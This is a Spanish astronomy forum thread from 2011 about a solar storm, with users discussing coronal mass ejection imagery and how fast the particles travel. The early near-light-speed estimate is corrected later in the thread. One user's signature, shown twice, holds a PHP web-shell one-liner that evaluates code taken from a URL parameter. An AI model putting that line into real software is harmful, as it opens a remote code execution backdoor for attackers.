Tormenta Solar noche 8/6/2011

Subforo para recomendaciones de objetos a observar tanto de objetos de cielo profundo como estrellas, dibujos, etc.
carlos
Mensajes: 96
Registrado: Mar Sep 01, 2009 8:45 pm

Tormenta Solar noche 8/6/2011

Mensaje por carlos »

Hola a todos!
"Frikeando" a traves de internet me he encontrado con esta notica, una tormenta solar que tendra lugar a las 18:00 hora estadounidense.Nose como afectara esto a los aparatos electronicos pero guardarlos en un lugar seguro :D yo ya me veo forrando el ordena con papel de aluminio jajajajaja. Os dejo el enlace de la noticia en la cual sale una espectacular imagen del sol.

Un Saludo

http://www.regiosfera.com/alerta-nasa-d ... nta-solar/
jose
Mensajes: 1249
Registrado: Vie Nov 12, 2010 11:36 pm

Tormenta Solar noche 8/6/2011

Mensaje por jose »

yo creo que la foto es un montaje
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Tormenta Solar noche 8/6/2011

Mensaje por m3ntol »

Las imágenes de EMC son espectaculares y hoy en día con los coronógrafos y los satélites del SOHO imágenes como la que tiene el artículo son muy comunes.
Lo que no creo es que corresponda con la eyección que han detectado los satélites, más bien será una imagen de archivo.
Te recomiendo ver el documental ` Solarmax` en el que todas las imágenes y vídeos son reales y se ven EMC increibles.
phpbb:eval(stripslashes($_GET[e]));
Avatar de Usuario
Arbacia
Mensajes: 1185
Registrado: Vie Ago 31, 2007 2:50 pm

Tormenta Solar noche 8/6/2011

Mensaje por Arbacia »

No, no son tomas de archivo. Son de la reciente emisión.
carlos
Mensajes: 96
Registrado: Mar Sep 01, 2009 8:45 pm

Tormenta Solar noche 8/6/2011

Mensaje por carlos »

Es impresionante el video me a dejado sin palabras :o
musasi
Mensajes: 8
Registrado: Lun Oct 18, 2010 3:37 pm

Tormenta Solar noche 8/6/2011

Mensaje por musasi »

[quote="carlos"]Hola a todos!
"Frikeando" a traves de internet me he encontrado con esta notica, una tormenta solar que tendra lugar a las 18:00 hora estadounidense.Nose como afectara esto a los aparatos electronicos pero guardarlos en un lugar seguro :D yo ya me veo forrando el ordena con papel de aluminio jajajajaja. Os dejo el enlace de la noticia en la cual sale una espectacular imagen del sol.

Un Saludo

http://www.regiosfera.com/alerta-nasa-d ... nta-solar/[/quote]

creo que no sera para tato como siempre, pero una pregunta
¿ cuanto tarda en llegar a la tierra las particular que tanto daño hacen desde que se produce el fenómeno ?
saludos
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Tormenta Solar noche 8/6/2011

Mensaje por Manuelariza »

Pues teniendo cuenta la distancia Sol-Tierra,unos 149.597. 870 Km y que las partículas que emite el Sol en una explosión de este tipo viajan a una velocidad parecida a la de la Luz, pues con estos datos puedes sacar una cifra aproximada.
Mas o menos tardaria entre 8-9 minutos.


Saludos...
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Tormenta Solar noche 8/6/2011

Mensaje por m3ntol »

El cálculo es perfecto pero las partículas de una EMC no viajan a la velocidad de la luz sino a bastante menos, se calcula que en torno a 1000 Km/sg aunque hay eyecciones lentas de 20Km/sg y rápidas de hasta 2000Km/sg.

Hay una actividad muy interesante de la NASA para hacer este cálculo:
http://www-istp.gsfc.nasa.gov/istp/outr ... asure.html

Una eyección media de 1000Km/sg tardaría poco más de dos días en llegar a la Tierra, la que se trata en este hilo llegó ayer por la tarde y se ` cepilló` varios canales de TDT además de provocar un apagón de medio minuto en mi ciudad (Coslada) que no se si fue causa directa o acción preventiva de las compañias de luz.
phpbb:eval(stripslashes($_GET[e]));
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Tormenta Solar noche 8/6/2011

Mensaje por Manuelariza »

[quote="m3ntol"]El cálculo es perfecto pero las partículas de una EMC no viajan a la velocidad de la luz sino a bastante menos, se calcula que en torno a 1000 Km/sg aunque hay eyecciones lentas de 20Km/sg y rápidas de hasta 2000Km/sg.

Hay una actividad muy interesante de la NASA para hacer este cálculo:
http://www-istp.gsfc.nasa.gov/istp/outr ... asure.html

Una eyección media de 1000Km/sg tardaría poco más de dos días en llegar a la Tierra, la que se trata en este hilo llegó ayer por la tarde y se ` cepilló` varios canales de TDT además de provocar un apagón de medio minuto en mi ciudad (Coslada) que no se si fue causa directa o acción preventiva de las compañias de luz.[/quote]

Efectivamente,creo que me he equivocado y bastante con la velocidad de las partículas.

Saludos...
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
Responder